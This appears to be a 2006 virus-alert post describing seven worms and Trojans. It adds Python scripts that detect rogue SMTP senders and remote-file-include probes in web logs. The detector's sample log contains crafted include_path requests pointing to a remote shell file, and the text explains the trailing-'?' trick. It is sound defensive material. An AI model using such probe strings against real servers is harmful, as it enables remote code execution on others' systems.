2006-04-03 15:21

[Virus Alert] 7 new worms found

Worm name: WORM_MYTOB.PE

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This memory-resident worm propagates by sending email messages using its own Simple Mail Transfer Protocol (SMTP) engine or any available servers. Since its email propagation does not require any user intervention, a user is often unaware that this worm is sending out email messages. The said email message contains a spoofed link that when clicked, redirects the user to the following URL:


It harvests email addresses from the Windows Address Book (WAB). It also spoofs the From field by using certain strings along with the email addresses it gathers or generates.


By doing the said actions, this worm is able to effectively propagate and consume bandwidth.
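A worm with its own SMTP engine bypasses the organisation's mail relay, so a workstation opening TCP/25 connections straight to Internet hosts is a strong signal of the propagation described above. The following script is an added example written for this page, not Trend Micro's code; the flow records, the 10.0.0.0/8 internal range and the relay address 10.0.1.2 are constructed, and the record layout (source, destination, port, packets) is an assumed simplification of a firewall or NetFlow export.

```python
"""Spot internal hosts that send mail directly to the Internet.

Input is a list of connection records (constructed here; in practice taken
from a firewall or NetFlow export). Any internal source that is not an
approved relay and that connects to external hosts on TCP/25 is reported,
together with the number of distinct external destinations it contacted.
"""
from ipaddress import ip_address, ip_network

# Constructed sample flows: (src_ip, dst_ip, dst_port, packets)
SAMPLE_FLOWS = [
    ("10.0.5.17", "198.51.100.10", 25, 12),   # workstation -> external MX
    ("10.0.5.17", "203.0.113.22", 25, 9),     # same workstation, another MX
    ("10.0.5.17", "192.0.2.44", 25, 3),
    ("10.0.1.2", "198.51.100.10", 25, 40),    # approved relay: expected
    ("10.0.5.23", "10.0.1.2", 25, 5),         # workstation -> internal relay: expected
    ("10.0.5.40", "192.0.2.44", 443, 30),     # unrelated HTTPS traffic
    ("10.0.5.61", "192.0.2.45", 25, 1),       # single direct delivery
]

INTERNAL_NETS = [ip_network("10.0.0.0/8")]   # assumed internal address space
ALLOWED_RELAYS = {"10.0.1.2"}                 # assumed sanctioned mail relay


def is_internal(ip):
    """True if the address falls inside one of the internal networks."""
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def rogue_smtp_senders(flows, allowed_relays=ALLOWED_RELAYS, min_distinct_dsts=1):
    """Return {src_ip: number of distinct external SMTP destinations}.

    Raising min_distinct_dsts trades a few missed single deliveries for
    fewer false positives from, say, a laptop that briefly used a remote MX.
    """
    dsts = {}
    for src, dst, port, _packets in flows:
        if port != 25:
            continue
        if not is_internal(src) or src in allowed_relays:
            continue
        if is_internal(dst):
            continue  # mail handed to an internal relay is normal
        dsts.setdefault(src, set()).add(dst)
    return {src: len(d) for src, d in dsts.items() if len(d) >= min_distinct_dsts}


if __name__ == "__main__":
    for host, count in sorted(rogue_smtp_senders(SAMPLE_FLOWS).items()):
        print(f"{host}: {count} external SMTP destination(s)")
```

With the sample flows the script reports 10.0.5.17 (three external mail servers) and 10.0.5.61 (one). Blocking outbound TCP/25 from everything except the relay at the perimeter turns the same observation into a control rather than an alert.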


Worm name: TROJ_MITGLIED.AL

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This Trojan arrives on a system as an attachment to spammed email messages. It waits for an active Internet connection. Once it detects one, it connects to certain URLs to download a possibly malicious file. It should be noted that it has a long list of URLs to download from, giving it a high chance of affecting a system.


Worm name: SYMBOS_FLEXSPY.A

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This commercial Symbian application needs user intervention to be installed on target devices. Upon execution, it prompts the user to install the application Phones. It also prompts the user to select where the said application is to be installed.


It logs phone activity, such as call details, SMS, MMS, GPRS, and email details. It then sends the gathered information to a remote server. The user may access the gathered information over the Internet.


The information-gathering capability of this application may be used for malicious purposes, thus, becoming a threat to information security.


Worm name: TROJ_SMALL.BOA

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This Trojan usually arrives as an attachment to spammed email messages. The email message purports to be from the Federal Bureau of Investigation (FBI), informing of supposed terrorist attacks. It banks on the populace's concern and fear regarding terrorism to trick users into opening the malicious attachment.


It may also arrive as a file dropped by other malware or as a file downloaded unknowingly by a user when visiting malicious Web sites.


Upon execution, it connects to the URL, fl{BLOCKED}ntent.com/tro_usa to download a file detected by Trend Micro as TSPY_FLECSIP.N. The said routine exposes the affected system to further malicious attacks.


Worm name: JS_FLUMITA.B

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This JavaScript, contained in an HTML file, redirects to a CGI Web page that exploits the Mismatched Document Object Model Objects Memory Corruption vulnerability. For more information regarding the said Windows vulnerability, refer to the following Microsoft Web page:


Because of this routine, the user may not be aware that his computer is already infected, and remains oblivious to any suspicious activity.


By connecting to this malicious Web site, the computer may be exposed to remote attacks. The aforementioned exploit takes advantage of a vulnerability in the createTextRange Method call process in Internet Explorer.


Worm name: ELF_LUPPER.I

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This executable Linux file (ELF) is a command line tool used in connecting to various ports. It may be used to connect to systems controlled by remote malicious users and this routine provides them with a shell to control an affected system.


It takes advantage of the XML-RPC for PHP Remote Code Injection vulnerability, found in several applications, to propagate across networks. It does the mentioned routine by generating random IP addresses and appending certain strings to access vulnerable systems.


It also takes advantage of a known vulnerability in Mambo, which is an open source content management system commonly used in Linux platforms.


It may also connect to specific IP addresses to download and save the file LISTEN in the folder /tmp.


Worm name: ELF_KAITEN.AM

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This malicious executable Linux file (ELF) may be dropped by another malware via a known vulnerability in Mambo. Mambo is an open source content management system commonly used in Linux platforms.


Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that a script function does not validate certain variables, which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.
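The Mambo flaw described here and the propagation of ELF_LUPPER.I above share one trait: the request that triggers a remote-include bug carries an attacker-supplied URL in a script variable, so the attempt is already visible in the web server's access log. The script below is an added example for this page, not Trend Micro's or Mambo's code. The log lines are constructed, and the parameter name `include_path` is a made-up stand-in, not the variable Mambo actually failed to validate.

```python
"""Flag web requests whose query parameters carry a remote URL.

Parses Apache Common Log Format lines (constructed samples below), URL-
decodes the query string and reports every parameter whose value starts
with a URL scheme. Parameters that legitimately take URLs (a search box,
for example) are allowlisted so they do not drown the real signal.
"""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
URL_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines; hosts are documentation addresses,
# paths and parameter names are invented for illustration.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Apr/2006:15:21:05 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [03/Apr/2006:15:21:06 +0000] "GET /includes/config.php?include_path=http://203.0.113.9/shell.txt? HTTP/1.0" 200 312
203.0.113.9 - - [03/Apr/2006:15:21:07 +0000] "GET /includes/config.php?include_path=http%3A%2F%2F203.0.113.9%2Fshell.txt%3F HTTP/1.0" 200 312
192.0.2.33 - - [03/Apr/2006:15:21:09 +0000] "GET /search.php?q=http%3A%2F%2Fexample.org%2F HTTP/1.1" 200 2048
192.0.2.33 - - [03/Apr/2006:15:21:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 98
"""


def parse_line(line):
    """Return the matched fields of one CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_attempts(log_text, allowed_params=("q",)):
    """Return (client_ip, path, param, value) for each URL-valued parameter.

    Values are compared after URL decoding, so percent-encoded schemes
    (the second probe above) are caught as well as plain ones.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if param in allowed_params:
                continue
            if URL_VALUE.match(value):
                hits.append((rec["ip"], parts.path, param, value))
    return hits


if __name__ == "__main__":
    for ip, path, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value}")
```

On the samples this reports the two probes from 203.0.113.9 and ignores the search query that happens to contain a URL. The trailing `?` in the injected value is the usual trick for discarding whatever the vulnerable script appends to the variable, so a lone `?` at the end of a URL-valued parameter is worth a closer look even when the scheme check alone would be noisy. The POST to xmlrpc.php is not caught because Common Log Format records no request body; the XML-RPC injection used by ELF_LUPPER.I needs body logging or a web application firewall to observe.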


Upon execution, this malicious executable Linux file connects to certain Internet Relay Chat (IRC) servers and joins a specific IRC channel. Once a connection is established, it enables a remote malicious user to issue certain commands on the system. The said routine gives the remote malicious user virtual control over the affected system, thus compromising system security.


References:

http://www.trendmicro.com/vinfo/ (TrendMicro Virus Security Info)

http://www.trendmicro.com/vinfo/zh-tw/default.asp (Traditional Chinese TrendMicro Virus Security Info)
